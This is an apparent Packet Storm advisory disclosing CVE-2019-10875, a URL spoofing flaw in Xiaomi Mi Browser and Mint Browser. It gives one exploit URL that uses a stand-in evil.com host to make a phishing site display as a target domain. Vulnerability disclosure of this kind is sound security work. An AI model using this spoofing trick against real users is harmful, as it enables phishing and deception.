Xiaomi Mi Browser version 10.5.6-g and Mint Browser version 1.5.3 suffer from a URL spoofing vulnerability.
146281cb738d6d648df337f2594fc86db59736898ef13fbbc5bde39f583c0133# Exploit Title: URL Spoofing Exploit for Xiaomi Mi Browser (v10.5.6-g) and Mint Browser (v1.5.3)
# Date : 11/04/2019
# Exploit Author: Arif Khan (@payloadartist)
# Vendor Homepage: www.xiaomi.com
# Version : v10.5.6-g and v1.5.3
# Tested On : MIUI OS, v10.1.3.0
# CVE : CVE-2019-10875
Exploit: https://www.evil.com/?q=www.target.com
The attacker can thus pass off his site, www.evil.com as www.target.com due to the way Xiaomi browsers handle the query parameter's value.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed